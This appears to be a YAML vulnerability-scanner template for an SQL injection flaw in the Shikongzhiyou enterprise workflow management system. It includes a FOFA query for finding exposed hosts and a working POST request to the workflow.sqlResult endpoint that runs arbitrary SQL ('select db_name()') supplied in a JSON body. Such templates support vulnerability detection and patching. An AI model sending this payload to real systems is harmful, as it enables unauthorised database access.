id: shikongzhiyou-formservice-sqli

info:
  name: 时空智友企业流程化管控系统SQL注入漏洞
  author: fgz
  severity: critical
  verified: true
  description: |-
    时空智友企业信息管理系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化，从而提高工作效率、降低成本并提升管理水平。时空智友企业流程化管控系统存在SQL注入漏洞，攻击者通过恶意构造的SQL查询来执行未经授权的数据库操作。当应用程序未能正确验证、转义或过滤用户提供的输入数据时，攻击者可以利用这个漏洞来执行恶意的SQL语句，从而绕过应用程序的访问控制和执行非法操作。
    FOFA: body="时空智友企业信息管理"
  reference:
    - https://mp.weixin.qq.com/s/iluDHRYq3xGZsvIXug_t_w
  tags: shikongzhiyou,sqli
  created: 2023/09/14

rules:
  r0:
    request:
      method: POST
      path: /formservice?service=workflow.sqlResult
      headers:
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Cookie: JSESSIONID=abcfTskygBv73ehavzoNy; __qypid=""; ecology_JSessionId=abcfTskygBv73ehavzoNy; ecology_JSessionid=abcfTskygBv73ehavzoNy
        Upgrade-Insecure-Requests: 1
        Pragma: no-cache
        Cache-Control: no-cache
        Content-Type: application/json
      body: '{"params": {"a": "11"}, "sql": "select db_name()"}'
    expression: |
      response.status == 200 && response.body.bcontains(b"<root>")

expression: r0()
